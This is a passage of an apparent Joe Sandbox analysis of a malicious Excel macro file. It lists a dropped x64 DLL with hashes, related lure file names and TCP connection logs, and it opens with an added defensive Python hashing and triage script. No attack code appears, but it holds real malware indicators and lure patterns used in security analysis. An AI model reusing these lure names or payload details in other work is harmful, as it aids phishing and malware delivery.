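The two dropped files above are identified by path and by the other samples that dropped them; the per-file entries that follow give the fields (file type, size, hashes, entropy) an analyst matches against a local copy. The script below is an added Python example, not part of the Joe Sandbox report, that reproduces those fields for an arbitrary file and flags a PE image stored under a non-executable extension such as .fml. The minimal PE header it builds is constructed test input, and the set of extensions treated as "expected" for PE content is an assumption.

```python
import hashlib
import math
import struct

# Extensions under which a PE payload is "expected"; anything else is flagged as a
# content/extension mismatch. This set is an assumption, not a Joe Sandbox rule.
PE_EXTENSIONS = {"exe", "dll", "sys", "ocx", "scr", "drv", "cpl", "efi"}

IMAGE_FILE_MACHINE_AMD64 = 0x8664   # COFF Machine value for x86-64
IMAGE_FILE_DLL = 0x2000             # COFF Characteristics flag for a DLL image


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_info(data: bytes) -> tuple:
    """Return (is_pe, is_x64, is_dll) by following e_lfanew from the DOS header to the COFF header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return (False, False, False)
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # The "PE\0\0" signature (4 bytes) plus the 20-byte COFF file header must fit in the buffer.
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return (False, False, False)
    machine, _nsec, _ts, _symtab, _nsyms, _optsz, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4
    )
    return (True, machine == IMAGE_FILE_MACHINE_AMD64, bool(characteristics & IMAGE_FILE_DLL))


def triage(name: str, data: bytes) -> dict:
    """Reproduce the size / hash / type / entropy fields a sandbox lists for a dropped file."""
    is_pe, is_x64, is_dll = pe_info(data)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "entropy": shannon_entropy(data),
        "is_pe": is_pe,
        "x64": is_x64,
        "dll": is_dll,
        # A PE image under a non-executable extension is the "content does not match
        # file extension" condition worth alerting on.
        "ext_mismatch": is_pe and ext not in PE_EXTENSIONS,
    }


def build_fake_pe(machine: int = IMAGE_FILE_MACHINE_AMD64,
                  characteristics: int = IMAGE_FILE_DLL | 0x0002) -> bytes:
    """Constructed test input: a DOS header whose e_lfanew points at a bare PE signature + COFF header."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    # Constructed sample stored under the same odd extension the report shows.
    for key, value in triage("lsdfik[1].fml", build_fake_pe()).items():
        print(f"{key}: {value}")
```

On a real dropped file, call triage with the file name and its bytes; the MD5/SHA values are directly comparable with the report's fields, whereas the SSDEEP field needs a separate ssdeep implementation and is not reproduced here.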

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32+ executable (DLL) (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 57856
Entropy (8bit): 4.963425128586394
Encrypted: false
SSDEEP: 768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5: 7A1D163990ACE9CEF1D43831866109AB
SHA1: 38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256: 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512: 454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious: true
Joe Sandbox View:
                                                                                                                                                                                                                                        • Filename: List-4527768.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: Formtofill4184860.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55CFCD6F.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 174009
Entropy (8bit): 7.967231122944825
Encrypted: false
SSDEEP: 3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
MD5: C0AF15BAE70AFFC4BE7625110AEEF09A
SHA1: AEF94E038F0538C812AAF9EF605F76AF2376A26D
SHA-256: D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
SHA-512: 131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
Malicious: false
Reputation: low
C:\Users\user\Desktop\~$Vac.list07-20214862208.xlsm
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 165
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fV:vBFFGS
MD5: 797869BB881CFBCDAC2064F92B26E46F
SHA1: 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256: D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512: 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious: false
Reputation: high, very likely benign file
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
C:\Users\user\XTOWN.dll
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32+ executable (DLL) (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 57856
Entropy (8bit): 4.963425128586394
Encrypted: false
SSDEEP: 768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5: 7A1D163990ACE9CEF1D43831866109AB
SHA1: 38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256: 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512: 454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious: true
Joe Sandbox View:
• Filename: List-4527768.xlsm, Detection: malicious
• Filename: HRcontacts7752205.xlsm, Detection: malicious
• Filename: Formtofill4184860.xlsm, Detection: malicious
• Filename: sbf0127365-7431059.xlsm, Detection: malicious
• Filename: Outfordelivery799862.xlsm, Detection: malicious
• Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious
• Filename: DeliveryConf535215.xlsm, Detection: malicious
• Filename: PI-210610.xlsm, Detection: malicious
Reputation: low

Static File Info

General

File type: Microsoft Excel 2007+
Entropy (8bit): 7.939406643356395
TrID:
• Excel Microsoft Office Open XML Format document (40004/1) 83.33%
• ZIP compressed archive (8000/1) 16.67%
File name: Vac.list07-20214862208.xlsm
File size: 189905
MD5: 49dda1569fdceeb75d6bf6b3cd293e75
SHA1: 8f77afedef8985e2c48a70d6ae082afc3a48c55f
SHA256: ded09606ba0d53a60f51abcb8254decc7cb49e8a4e26ad8e97f6ee49a7dd12ef
SHA512: a3e6078ff87530417c7bbb31c26b386a111e7dbbfb4680cc8a376c13261aa33d43d2b265cf56b9552640444975a2fe2c1e1fc57858f9c7a25b3a76aae6be98aa
SSDEEP: 3072:GDusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/Xvpk:kRcGUlFzy4mpTHdrUc3/SsYASx

File Icon

Icon Hash: e4e2aa8aa4bcbcac

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                              Source Port  Dest Port  Source IP       Dest IP
Jul 6, 2021 16:03:20.217108011 CEST    49165        80         192.168.2.22    172.67.198.51
Jul 6, 2021 16:03:20.255635977 CEST    80           49165      172.67.198.51   192.168.2.22
Jul 6, 2021 16:03:20.255745888 CEST    49165        80         192.168.2.22    172.67.198.51
Jul 6, 2021 16:03:20.257003069 CEST    49165        80         192.168.2.22    172.67.198.51
Jul 6, 2021 16:03:20.295244932 CEST    80           49165      172.67.198.51   192.168.2.22
Jul 6, 2021 16:03:20.326716900 CEST    80           49165      172.67.198.51   192.168.2.22
Jul 6, 2021 16:03:20.326762915 CEST    80           49165      172.67.198.51   192.168.2.22
Jul 6, 2021 16:03:20.326855898 CEST    49165        80         192.168.2.22    172.67.198.51
Jul 6, 2021 16:03:20.327410936 CEST    49165        80         192.168.2.22    172.67.198.51
Jul 6, 2021 16:03:20.431318998 CEST    49166        80         192.168.2.22    172.67.194.117
Jul 6, 2021 16:03:20.470769882 CEST    80           49166      172.67.194.117  192.168.2.22
Jul 6, 2021 16:03:20.470868111 CEST    49166        80         192.168.2.22    172.67.194.117
Jul 6, 2021 16:03:20.471748114 CEST    49166        80         192.168.2.22    172.67.194.117
Jul 6, 2021 16:03:20.509968996 CEST    80           49166      172.67.194.117  192.168.2.22
Jul 6, 2021 16:03:20.528039932 CEST    80           49166      172.67.194.117  192.168.2.22
Jul 6, 2021 16:03:20.528080940 CEST    80           49166      172.67.194.117  192.168.2.22
Jul 6, 2021 16:03:20.528107882 CEST    80           49166      172.67.194.117  192.168.2.22
Jul 6, 2021 16:03:20.528136969 CEST    49166        80         192.168.2.22    172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528140068 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528162003 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528166056 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528170109 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528182030 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528198004 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528208017 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528225899 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528229952 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528251886 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528260946 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528278112 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528285980 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528304100 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528309107 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528337002 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528733969 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528769016 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528815031 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.529429913 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.529643059 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.529680967 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.529686928 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.529715061 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.530580044 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.530616999 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.530631065 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.530648947 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.531594038 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.531627893 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.531652927 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.531677961 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.532335997 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.532366991 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.532392979 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.532413006 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.533211946 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.533236980 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.533260107 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.533274889 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.533447027 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.534100056 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.534125090 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.534163952 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.534312010 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.535077095 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.535155058 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.535159111 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.535856009 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.535859108 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.535986900 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.536045074 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.536058903 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.536099911 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.536375999 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.536962032 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.537030935 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.537039995 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.537087917 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.566467047 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.566500902 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.566534996 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.566756010 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.566780090 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.566839933 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.566850901 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.566857100 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.567661047 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.567686081 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.567723036 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.567737103 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.568556070 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.568610907 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.568614006 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.568665028 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.569586992 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.569617987 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.569644928 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.569662094 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.570358038 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.570390940 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.570442915 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.570457935 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.571237087 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.571264029 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.571296930 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.571321011 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.672251940 CEST4916780192.168.2.22172.67.146.88
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.710473061 CEST8049167172.67.146.88192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.710562944 CEST4916780192.168.2.22172.67.146.88
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.711160898 CEST4916780192.168.2.22172.67.146.88
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.749607086 CEST8049167172.67.146.88192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.792047977 CEST8049167172.67.146.88192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.947158098 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.947326899 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.947387934 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.947618961 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.948383093 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.948410988 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.948479891 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.949496984 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.949516058 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.949635983 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.950639963 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.950659990 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.950737000 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.951694012 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.951714039 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.951814890 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.952791929 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.952811003 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.952882051 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.953948975 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.953969002 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.954077005 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.954963923 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.954982042 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.955127001 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.956087112 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.956104994 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.956223965 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.957139015 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.957158089 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.957246065 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.958216906 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.958235979 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.958329916 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.959284067 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.959301949 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.959476948 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:22.960380077 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.036715031 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.036740065 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.036835909 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.037048101 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.037100077 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.037173986 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.038372040 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.038391113 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.038463116 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.039302111 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.039324045 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.039411068 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.040400982 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.040420055 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.040548086 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.041529894 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.041551113 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.041625977 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.042591095 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.042608023 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.042707920 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.043752909 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.043757915 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.043870926 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.044835091 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.044853926 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.044955969 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.045802116 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.045819998 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.045883894 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.046962976 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.046988964 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.047061920 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.048024893 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.048052073 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.048134089 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.049135923 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.049153090 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.049205065 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.050302982 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.125731945 CEST44349168143.204.91.74192.168.2.22
